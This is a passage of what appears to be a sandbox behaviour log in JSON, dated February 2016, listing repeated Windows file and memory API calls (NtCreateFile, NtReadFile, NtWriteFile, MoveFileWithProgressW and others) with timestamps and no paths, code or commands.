17:42:04,224", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,224", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,224", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,224", "api": "FindFirstFileExW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:04,224", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,224", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,235", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,235", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,235", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,235", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,235", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,235", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,235", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,235", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,245", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,245", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,245", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,245", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,245", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,245", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,245", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,245", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,245", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,255", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,255", "api": "NtSetInformationFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:42:04,255", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,255", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,255", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,265", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,265", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,265", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,265", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,265", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,265", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,265", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,275", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,275", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,275", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,275", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,275", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,275", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,275", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,275", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,285", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,285", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,285", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 
17:42:04,285", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,285", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,285", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,285", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,285", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,295", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,295", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,295", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,295", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,295", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,295", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,295", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,295", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,305", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,305", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,305", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,305", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,305", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,305", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,305", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,305", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,305", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,305", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,315", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,315", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,315", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,315", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,315", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,315", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,315", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,315", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,315", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,325", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,325", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,325", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,325", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,325", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,325", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,325", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,325", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,325", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,345", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,345", "api": 
"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,345", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,345", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,345", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,345", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,355", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,355", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,355", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,355", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,355", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,355", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,355", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,355", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,355", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,355", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,365", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,375", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,375", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,385", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,385", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,395", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,395", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:04,395", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,405", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,405", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,805", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,805", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,815", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,815", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,815", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,815", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,815", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,815", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,815", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,815", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,815", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,815", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,825", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,825", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,825", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,825", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,825", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,825", "api": "NtFreeVirtualMemory"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:04,825", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,825", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,835", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,835", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,835", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,835", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,835", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,845", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,845", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,845", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,845", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,845", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,845", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,845", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,845", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,855", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,855", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,855", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,855", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,855", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,855", "api": "NtWriteFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:42:04,855", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,855", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,865", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,865", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,865", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,865", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,865", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,865", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,865", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,865", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,875", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,875", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,875", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,875", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,875", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,875", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,875", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,885", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,885", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,885", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,885", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:42:04,885", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,885", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,885", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,895", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,895", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,895", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,895", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,895", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,895", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,895", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,895", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,905", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,905", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,905", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,905", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,905", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,905", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,905", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,905", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,915", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,915", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,915", 
"api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,915", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,915", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,926", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,926", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,926", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,926", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,926", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,926", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,926", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,926", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,936", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,936", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,936", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,936", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,936", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,936", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,936", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,946", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,946", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,946", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,946", "api": 
"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,946", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,946", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,956", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,956", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,956", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,956", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,956", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,956", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,956", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,966", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,966", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,966", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,966", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,966", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,966", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,966", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,976", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,976", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,976", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,976", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,976", "api": "MoveFileWithProgressW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:04,986", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,986", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,986", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,986", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,986", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,986", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,986", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,986", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,996", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,996", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,996", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,996", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,996", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:04,996", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,996", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,996", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,996", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:04,996", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,006", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,006", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,006", "api": "NtSetInformationFile"}, {"category": "process", 
"timestamp": "2016-02-16 17:42:05,006", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,006", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,006", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,006", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,006", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,006", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,016", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,016", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,016", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,016", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,016", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,026", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,026", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,026", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,036", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,036", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,036", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,036", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,036", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,046", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,046", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:42:05,046", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,046", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,046", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,046", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,056", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,056", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,056", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,056", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,056", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,066", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,066", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,066", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,066", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,066", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,076", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,076", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,076", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,076", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,076", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,076", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,076", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,076", 
"api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,086", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,086", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,086", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,086", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,086", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,086", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,096", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,096", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,096", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,096", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,096", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,096", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,096", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:05,106", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,106", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,106", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:05,106", "api": "NtReadFile"}, {"category": 